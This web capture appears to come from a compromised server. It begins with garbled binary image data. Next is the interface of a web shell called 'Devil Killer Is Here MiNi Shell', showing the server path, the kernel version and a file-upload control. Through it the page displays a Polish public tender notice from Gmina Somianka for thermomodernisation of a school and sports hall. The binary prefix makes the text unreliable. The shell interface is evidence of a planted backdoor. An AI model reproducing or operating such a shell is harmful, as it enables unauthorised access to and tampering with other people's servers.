JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221027/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221027/0041387001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Termomodernizacja Zespołu Szkolno-Przedszkolnego wraz z halą sportową w miejscowości Somianka </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Somianka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 550668090</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Somianka-Parcele 16B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Somianka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">07-203</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL924 - Ostrołęcki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">297418790</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@somianka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.ugsomianka.bip.org.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Termomodernizacja Zespołu Szkolno-Przedszkolnego wraz z halą sportową w miejscowości Somianka </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-83254aa8-55ee-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00413870</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00026840/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.13 Termomodernizacja budynku Zespołu Szkolno-Przedszkolnego wraz z halą sportową w miejscowości Somianka</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/somianka <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcą odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy działającej pod adresem:<br/>https://platformazakupowa.pl/pn/somianka</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Określone w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zapisy dotyczące ochrony danych osobowych określono w rozdziale XXIV SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Kz.272.14.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczegółowy opis przedmiotu zamówienia, znajduje się w załączniku nr 2 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45214200-2 - Roboty budowlane w zakresie budowy obiektów budowlanych związanych ze szkolnictwem</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamówienie udzielone będzie wyłącznie Wykonawcy wybranemu zgodnie z <br/>przepisami ustawy Prawo zamówień publicznych. Zamawiający wybierze ofertę <br/>najkorzystniejszą na podstawie kryteriów oceny ofert określonych w Specyfikacji <br/>Warunków Zamówienia. Jeżeli Zamawiający nie będzie mógł wybrać oferty <br/>najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans <br/>ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z <br/>najniższą ceną.<br/>2. Zamawiający dokona wyboru najkorzystniejszej oferty według następujących kryteriów:<br/>1) K1 – cena – 60 pkt<br/>2) K2 – długość okresu gwarancji – 40 pkt<br/>• liczba punktów w kryterium – cena 60 pkt zostanie obliczona wg wzoru <br/> cena oferty najniżej skalkulowanej spośród ofert nieodrzuconych<br/>liczba punktów badanej oferty =.......................................................... x 60<br/> cena oferty badanej<br/>• liczba punktów w kryterium – długość okresu gwarancji, będzie przyznana w <br/>następujący sposób:<br/>- 36 miesięcy – 0 pkt<br/>- 48 miesięcy – 20 pkt<br/>- 60 miesięcy – 40 pkt<br/>3. Zamawiający ustala minimalny wymagany termin udzielonej przez Wykonawcę <br/>gwarancji na wykonane roboty budowlane oraz użyte/dostarczone materiały na okres <br/>36 miesięcy, licząc od dnia bezusterkowego końcowego odbioru robót. Wykonawca może <br/>przedłużyć termin gwarancji na wykonane roboty budowlane oraz użyte/dostarczone <br/>materiały na okres maksymalnie 60 miesięcy, licząc od dnia bezusterkowego końcowego <br/>odbioru robót. Jeżeli Wykonawca udzieli gwarancji na okres dłuższy niż 60 miesięcy, <br/>Zamawiający obliczając ilość punktów w kryterium „długość okresu gwarancji”, będzie <br/>traktował taki zapis tak, jak gdyby Wykonawca udzielił gwarancji na okres 60 miesięcy. <br/>Do umowy również zostanie wprowadzony termin gwarancji na wykonane roboty <br/>budowlane oraz użyte/dostarczone materiały na okres 60 miesięcy, licząc od dnia <br/>„Termomodernizacja zespołu szkolno-przedszkolnego wraz z halą sportową w miejscowości <br/>Somianka”<br/>29<br/>bezusterkowego końcowego odbioru robót (pomimo proponowanego w ofercie przez <br/>Wykonawcę dłuższego okresu gwarancji).<br/>4. W przypadku, gdy Wykonawca nie poda żadnego okresu gwarancji w Formularzu oferty, <br/>Zamawiający przyjmie, że Wykonawca udziela gwarancji na okres 36 miesięcy.<br/>5. Wymagane jest podanie w ofercie okresu gwarancji w miesiącach.<br/>6. Końcowa ocena oferty to suma punktów uzyskanych za poszczególne kryteria wg wzoru:<br/>Lp = K1 + K2<br/>gdzie:<br/>Lp – liczba punktów uzyskanych przez ofertę,<br/>K1 – liczba punktów uzyskanych w kryterium „cena”,<br/> K2 – liczba punktów uzyskanych w kryterium „długość okresu gwarancji”.<br/>7. Najkorzystniejsza oferta to oferta, która przedstawia najkorzystniejszy bilans ceny i innych <br/>kryteriów, czyli oferta, która uzyska najwyższą sumaryczną liczbę punktów (liczoną do <br/>dwóch miejsc po przecinku).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wskaże, że:<br/>a) posiada wiedzę i doświadczenie niezbędne do wykonania zamówienia, tj.: w okresie <br/>ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres <br/>prowadzenia jest krótszy w tym okresie wykonał należycie, zgodnie z przepisami <br/>prawa budowlanego i prawidłowo ukończył, co najmniej jedną zadanie polegające <br/>na termomodernizacji lub remoncie budynków o wartości nie mniejszej niż <br/>500 000,00 zł brutto każde zadanie.<br/>- Jeżeli Wykonawca wykazuje doświadczenie nabyte w ramach kontraktu (zamówienia/ <br/>umowy) realizowanego przez wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia (konsorcjum), Zamawiający nie dopuszcza by Wykonawca polegał na <br/>doświadczeniu grupy Wykonawców, której był członkiem, jeżeli faktycznie i <br/>konkretnie nie wykonywał wykazanego zakresu prac. Zamawiający zastrzega <br/>możliwość zwrócenia się do wykonawcy o wyjaśnienie w zakresie faktycznie <br/>konkretnie wykonywanego zakresu prac oraz przedstawienia stosownych dowodów <br/>np.: umowy konsorcjum, z której wynika zakres obowiązków czy wystawionych przez <br/>wykonawcę faktur.<br/>- Zamawiający uzna za spełniony warunek SWZ również w przypadku, gdy <br/>doświadczenie wykazane przez Wykonawcę obejmuje szerszy zakres robót <br/>budowlanych od wymaganych od Zamawiającego.<br/>- Zamawiający nie dopuszcza sumowania robót budowlanych wykonanych w ramach <br/>odrębnych kontraktów (umów/ zamówień) celem uzyskania wymaganego warunku.<br/>b) dysponuje osobami zdolnymi do wykonywania zamówienia, które będą <br/>uczestniczyć w wykonaniu zamówienia, tj. posiadającymi prawo do <br/>wykonywania samodzielnych funkcji technicznych w budownictwie zgodnie z <br/>poniższymi wyszczególnieniem:<br/>- co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania <br/>robotami budowlanymi w specjalności konstrukcyjno – budowlanej lub <br/>odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie <br/>wcześniej obowiązujących przepisów, a w przypadku Wykonawców zagranicznych –<br/>uprawnie budowlane do kierowania robotami równoważne do wyżej wskazanych,<br/>która będzie pełniła funkcje kierownika budowy.<br/> Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie <br/>spełnia na podstawie złożonych dokumentów <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku <br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego <br/>2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z <br/>innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności <br/>do tej samej grupy kapitałowej wraz z dokumentami lub informacjami <br/>potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy <br/>należącego do tej samej grupy kapitałowej, zgodnie ze wzorem stanowiącym załącznik <br/>nr 4 do SWZ;<br/>2) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i <br/>Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, <br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne <br/>przepisy wymagają wpisu do rejestru lub ewidencji;<br/>a) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami <br/>Rzeczypospolitej Polskiej, zamiast dokumentu jak wyżej, składa dokument lub <br/>dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce <br/>zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono <br/>upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z <br/>wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje <br/>się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury <br/>przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>b) Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub <br/>miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się <br/>dokumentów, o których mowa powyżej, zastępuje się je dokumentem <br/>zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo <br/>osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument <br/>miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca <br/>ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod <br/>przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, <br/>organem samorządu zawodowego lub gospodarczego, właściwym ze względu na <br/>siedzibę lub miejsce zamieszkania wykonawcy.<br/>c) Dokumenty/oświadczenia, o których mowa w lit. a i b powinny być wystawione <br/>nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>3) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że <br/>wykonawca nie zalega z opłacaniem podatków i opłat w zakresie art. 109 ust. 1 pkt 1 <br/>ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w <br/>przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem <br/>zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed <br/>upływem terminu składnia ofert wykonawca dokonał płatności należnych podatków lub <br/>opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie <br/>spłat tych należności; <br/>4) zaświadczenie albo innego dokumentu właściwej terenowej jednostki organizacyjnej <br/>Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub <br/>właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego <br/>potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie społeczne i zdrowotne w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie <br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem <br/>składek na ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem albo innym <br/>dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że <br/>odpowiednio przed upływem terminu składnia ofert wykonawca dokonał płatności <br/>należnych składek na ubezpieczenie społeczne lub zdrowotne wraz z odsetkami lub <br/>grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności <br/>cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze <br/>wskazaniem sumy gwarancyjnej tego ubezpieczenia wraz z dowodem uiszczenia <br/>opłaty;<br/>6) wykaz robót budowlanych, zgodnego ze wzorem stanowiącym załącznik nr 6 do SWZ, <br/>spełniających wymagania określone w rozdz. VI ust. 1 pkt 4 lit. a SWZ wykonanych <br/>nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a <br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich <br/>rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty <br/>te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty <br/>budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są <br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty <br/>budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego <br/>nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty;<br/>7) wykaz osób, zgodnego ze wzorem stanowiącym załącznik nr 5 do SWZ, skierowanych <br/>przez wykonawcę do realizacji zamówienia publicznego, w szczególności <br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami <br/>budowlanymi spełniających wymagania określone w rozdz. VI ust. 1 pkt 4 lit. b SWZ <br/>wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia <br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu <br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania <br/>tymi osobami, spełniających wymagania określone w rozdz. VI ust. 1 pkt 4 lit. b SWZ.<br/>8) Oświadczenie na temat wykształcenia i kwalifikacji zawodowych wykonawcy lub kadry <br/>kierowniczej wykonawcy stanowiącym załącznik nr 7 do SWZ;<br/>9) Jeżeli dotyczy – wykaz części zamówienia, których realizację wykonawca zamierza <br/>powierzyć podwykonawcom, stanowiącym załącznik nr 8 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: <br/>5000,00 zł (słownie: pięć tysięcy złotych i 00/100).<br/>2. Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać <br/>nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o <br/>których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>„Termomodernizacja zespołu szkolno-przedszkolnego wraz z halą sportową w miejscowości <br/>Somianka”<br/>19<br/>3. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym <br/>przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem <br/>nowego wadium na przedłużony okres związania ofertą.<br/>4. Wadium może być wniesione w jednej lub kilku następujących formach:<br/>1) pieniądzu - przelewem na rachunek bankowy Zamawiającego Bank Spółdzielczy w <br/>Ostrowi Mazowieckiej oddział w Somiance: numer 28 8923 1076 0600 0824 2006 <br/>0006 z adnotacją: „Wadium - postępowanie nr Kz.272.14.2022.”,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy <br/>z dnia 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. <br/>z 2020 r. poz. 299).<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin <br/>uznania rachunku Zamawiającego.<br/>5. W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w <br/>terminie decydować będzie data i godzina wpływu środków na rachunek bankowy <br/>Zamawiającego. Zaleca się dołączenie kopii dokumentu przelewu do oferty, celem <br/>potwierdzenia tej formy wniesienia wadium. W formularzu ofertowym należy podać <br/>również numer konta, na które 